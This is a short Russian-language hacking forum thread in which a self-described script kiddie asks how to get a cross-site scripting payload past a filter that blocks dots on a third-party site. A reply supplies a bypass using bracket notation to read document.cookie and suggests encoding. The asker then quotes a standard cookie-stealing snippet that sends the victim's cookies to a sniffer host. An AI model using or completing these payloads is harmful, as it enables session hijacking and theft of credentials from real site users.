Вообщем ситуация такая... Есть один сайт с полем ввода данных, это поле не фильтрует запросы и передаёт эти запросы на второй сайт, где правильно составленный запрос выполняется в виде скрипта. Проблема в том, что запрос передаётся в поле, с очень жёсткой фильтрацией символов, и кроме как алерта с простым текстом ни чего сделать не выходит. Кароче: <script>alert("XSS")</script> - выполняется <script>alert(document.cookie)</script> - не выполняется, потому что там есть точка. В чём дело, бро? Как это порешать?
<script>alert(document["cookie"])</script> UDP: Легче всё зашифровать, так как точи в доменах и т. п. Тоже будут резаться.
Выводит! А как теперь присобочить стандартное: img = new Image(); img.src = "http://sniffer.site.ru/blablabls.gif?"+document.cookie; ?
Да, я глупый скриптикидди. Но ничего деструктивного делать я не собираюсь, спортивный интерес + новые знания
